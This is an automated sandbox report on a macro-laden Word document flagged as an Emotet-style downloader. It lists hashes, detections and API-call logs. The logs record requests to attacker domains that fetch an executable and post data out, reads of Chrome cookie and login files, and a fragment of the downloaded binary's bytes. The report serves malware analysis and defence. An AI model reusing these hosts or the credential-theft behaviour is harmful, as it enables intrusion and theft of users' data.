popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

0519_2457254452195.doc

Gen1 VBA_macro Socket ScreenShot DNS AntiDebug MSOffice File OS Processor Check AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 20, 2021, 9:48 a.m. May 20, 2021, 10:03 a.m.
Size 973.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: MyPc, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 19 11:36:00 2021, Last Saved Time/Date: Wed May 19 11:36:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
MD5 4680281474f5c31c4161ea107032b297
SHA256 49294badb32f0de8845001dcfa55223bb4bdf916905ef3148847ab9799b4d7f1
CRC32 3FAEDCA6
ssdeep 24576:MEIjrPUaphvGvGUZ93/semhXp7AsWZXgPUw2:M/jhvGvGU93097AFZgP
Yara
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • OS_Processor_Check_Zero - OS Processor Check
  • Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Microsoft_Office_File_Zero - Microsoft Office File

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features POST method with no referer header suspicious_request POST http://hrowedinizoin.ru/8/forum.php
request GET http://api.ipify.org/
request POST http://hrowedinizoin.ru/8/forum.php
request GET http://traverso.ru/6jkdfijsd.exe
request GET http://api.ipify.org/?format=xml
request POST http://hrowedinizoin.ru/8/forum.php
domain hrowedinizoin.ru description Russian Federation domain TLD
domain traverso.ru description Russian Federation domain TLD
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a01000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ebb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ec05000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x673a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66c91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e621000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e8c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e8c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8024
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 8024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x507c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0214e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73861000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x736f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6eac1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72931000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74e51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72de1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70ac1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73ef1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70aa1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76891000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x707d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74481000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66a91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e4c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x745d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x707a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74131000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70781000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70761000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70721000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x673a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66a71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 20480
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02160000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 6928
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00920000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 6928
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00980000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 6928
region_size: 77824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00990000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75241000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x740f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e80000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 6928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73771000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local State
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\~$19_2457254452195.doc
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000198
filepath: C:\Users\test22\AppData\Local\Temp\~$19_2457254452195.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$19_2457254452195.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
cmdline C:\Windows\System32\svchost.exe
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000404
process_name: pw.exe
process_identifier: 7308
1 1 0

Process32NextW

 snapshot_handle: 0x00000404
process_name: taskhost.exe
process_identifier: 8856
1 1 0

Process32NextW

 snapshot_handle: 0x00000404
process_name: WINWORD.EXE
process_identifier: 8024
1 1 0

Process32NextW

 snapshot_handle: 0x00000404
process_name: rundll32.exe
process_identifier: 6928
1 1 0

Process32NextW

 snapshot_handle: 0x00000404
process_name: svchost.exe
process_identifier: 5980
1 1 0

Process32NextW

 snapshot_handle: 0x00000404
process_name: conhost.exe
process_identifier: 7664
1 1 0

Process32NextW

 snapshot_handle: 0x00000404
process_name: pw.exe
process_identifier: 6152
1 1 0

Process32NextW

 snapshot_handle: 0x00000404
process_name: svchost.exe
process_identifier: 8740
1 1 0
Symantec ISB.Suspexec!gen29
Kaspersky VHO:Trojan.MSOffice.Alien.gen
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
TrendMicro HEUR_VBA.DE
McAfee-GW-Edition BehavesLike.OLE2.Downloader.db
TACHYON Suspicious/W97.NS.Gen
Ikarus Trojan-Dropper.VBA.Agent
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 0
family: 2
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL,à/ R(€p@€=Ê P¤$¬´R.textdPR`P`.data8pV@@À.rdatah.€0X@@@/4؏°ˆ@0@.bss@@€`À.idata¤P@0À.CRT8`(@0À.tlsp*@0ÀóÍ´&¼'ƒì1Àf=@MZÇìCDÇèCDÇäCDÇ€@DtI£@D¡øCD…Àt-Ç$èÒ>èÕ>‹DD‰èÌ?ƒ= pCtc1ÀƒÄÃÇ$è¥>ëы<@º@PEŠ@uŸ·Qfú t>fú uƒ¹„v„‹‘ø1À…Ò•Àérÿÿÿv¼'Ç$àRCèäA1ÀƒÄÃyt†Lÿÿÿ‹‰è1À…É•Àé:ÿÿÿfƒì,¡àCDÇD$@DÇD$@DÇD$@DÇ$@D£@D¡(pC‰D$ è>ƒÄ,ÃfL$ƒäð1ÀÿqüU‰åWVSQU¤¹ƒìx‹5øCD‰×ó«…ö…°d¡1ۋx‹5|TDë9Ç„5Ç$èÿփì‰Øð±=8DD…ÀuÞ¡<DD1ۃø„¡<DD…À„oÇ@D¡<DDƒø„…Û„1¡ ¬C…ÀtÇD$ÇD$Ç$ÿЃì èÄBÇ$`WCÿxTDƒì£ DDÇ$@è3=èAÇ4DD@èó<‹1ɅÀuëYt&„Òt,ƒát'¹ƒÀ¶€ú ~ç‰Ëƒó€ú"DËëèv¼'„Òuëv¼'€ú  ƒÀ¶„Òuñ£0DD‹øCD…ÛtöEи …ó£pC‹@D4‰4$è<…Û‰E‹@DŽl‰ÃFü‰×‰EŒЉE”‰ö¼'‹ƒÃƒÇ‰$è¼;p‰4$èÙ;‰Cü‹Oü‰t$‰$‰L$è³;9}”uʋEŒEÇ‹E£@Dè±<¡àRD‹@D‰¡@D‰D$¡@D‰D$¡@D‰$èL‹ @D£ @D…É„΋@D…Òu èw;¡ @DeðY[^_]aüÃf·EÔéÿÿÿ´&¡<DD»ƒø…âýÿÿÇ$è=;¡<DDƒø…íýÿÿÇD$`DÇ$`Dè ;…ÛÇ<DD…Ïýÿÿ‡8DDéÄýÿÿf‰$ÿ$TDƒìé?ýÿÿÇD$`DÇ$ `DÇ<DDè½:éxýÿÿ‹Eéàþÿÿ‰$è˜:¶¿ƒì ÇøCDè¾;ƒÄ é¶üÿÿ¶ƒì ÇøCDèž;ƒÄ é–üÿÿ¶ƒì‹D$ ‰$èE:…À”ÀƒÄ¶À÷ØАU‰åƒìø°C‰$@D‰D$è‡CƒÄ]Ãf.„U‰åƒìø°C‰$@D‰D$è\CƒÄ]ÃffffffU‰åSWVƒìHƒz‰×‰Ëuu؍W‰ñèl.‹…À…µ‰]ð_‰Ù賃gw‹G;G trHU؉OM¬ò@òEèòòHòMàòEØè.‰ÙèoÇGòEèòFòEØòMàòNò‹E¬…Àt˜‹MÀòE°òM¸‹]ðë4‰Ùè+ƒg‹]ðƒ,uKu؍W0‰ñè³-‹…Àt8‹MìòEÜòMä‰MÔòMÌòEĉòEÄòM̋EÔòCòK ‰CëO,è˃g,ƒ#ƒÄH^_[]ÃU‰åSWV1À@9B”Ã1ö9r•Ç ß9B,‹B ”Ã9r0¶÷•Ç ߶ÿ1Û÷;B”Ã!‰Y‰y^_[]ÃU‰åSWVì¤‰Mðj [‰Uì‹r;r tPF8‰Ù½Pÿÿÿ‰B‹ƒÆó¥ƒøt6‰Ù‰E´}¸µPÿÿÿƒøó¥u M´èÐë‹E¸j Y}„u¼…Àó¥u ‹Uì먋Eðƒ ëj [U´u„‰×‰Ùó¥‰Ù‰Ö‹}ð‰ƒÇó¥Ä¤^_[]ÃU‰åSWVƒäøƒì0‹r‹B )ð…Àt0^‰Z‹>òFòN ‹v…ÿ‰t$(òL$ òD$u ƒÀè‰Þë̃!ë=‹D$(òD$òL$ ‰9‰D$òL$ò$ò$òL$‹D$òAòI ‰Aeô^_[]ÃU‰åSWVì„u´‰MԉŰB;B „ H ‰JòòEÀ‹@‰Eȃ}À„ð‹EÈòEÀ‰ñ‰E¼òE´èYR‰Áèސ„À„·‰ñèCR‰Áè폅À„¡‰Ã‰Ö‰Ájh÷§Cèy#YZ1ÿ„Àt‰ò鎉]؉u܉u¨uØÆEàÇEä‰ñè돉ñ‰Ç‰U¤èߏ‰Æ‰UÐ1Àº|¥C…ö•À1ɅҋU¨•Á9ȉøu71ÿ…ö‰E¬t7¸|¥C…Àt.‰ñ‰u°‰Ö‹UÐjh|¥Cès‰ò‹u°ƒÄ„À‹E¬u ‹UЉljóë‹E¤…ۍu´Eû…ÿ„â…ۍMØDЉЉúPèyXƒ}؍EàMä‹]ÜDÁ¹óÿÿ‹8eB‰Eˆ‹Eˆȍ üƒCQjYQMˆQÿÐƒÄ ‰Ù‰újXPEˆPèpAYZM؉Ãèù„Ûtu‹E¼òE´}؉ù‰EàòEØèîP‰ÖMˆ‰ÂVèè·X‰ùè‹E òE˜òUˆòMpÿÿÿ‰ú‰EðòEèòMàòUØè=,‹…pÿÿÿ…Àu7‹U̍u´éøýÿÿ‰ñèÊ‹UÌééýÿÿƒeÀMÀèS ‹Eԃ Ä„^_[]͕tÿÿÿ‹uԋJòòJ‰òMàòE؉MèòEØòMà‹UèòFòN ‰VëµU‰åSWVƒì`‰×]ȉMð‹G;G „ÁH ‰OòòEä‹@‰Eìƒ}䄦‹EìòEä‰Ù‰EÐòEÈèÔO‰ÖM¬‰ÂVèζX‰Ùèý‹EÄòE¼òU¬òM´M”‰Ú‰EàòEØòMÐòUÈè&+‹E”…À„pÿÿÿU˜‹uð‹JòòJ‰òMÐòEȉMØòEÈòMЋUØòFòN ‰VëƒeäMäè‹Eðƒ ƒÄ`^_[]ÃU‰åSWVƒì,‹‹r‰Mì‹B ‹J)މEð‰Mè…ötFK‰ Š‹B€ûAr€û[rIˆß€ÇŸ€ÿs ëDˆß€ÇЀÿ rA‹}ð:t‹}è:t€û=u@N‰Ë‰B붋EìÆël±>ë±?뱉Mðë‰Ù€Á¿ë ‰Ù€Á¹ë‰Ù€ÁÇEð
request_handle: 0x00cc000c
1 1 0
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000408
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x000003c8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

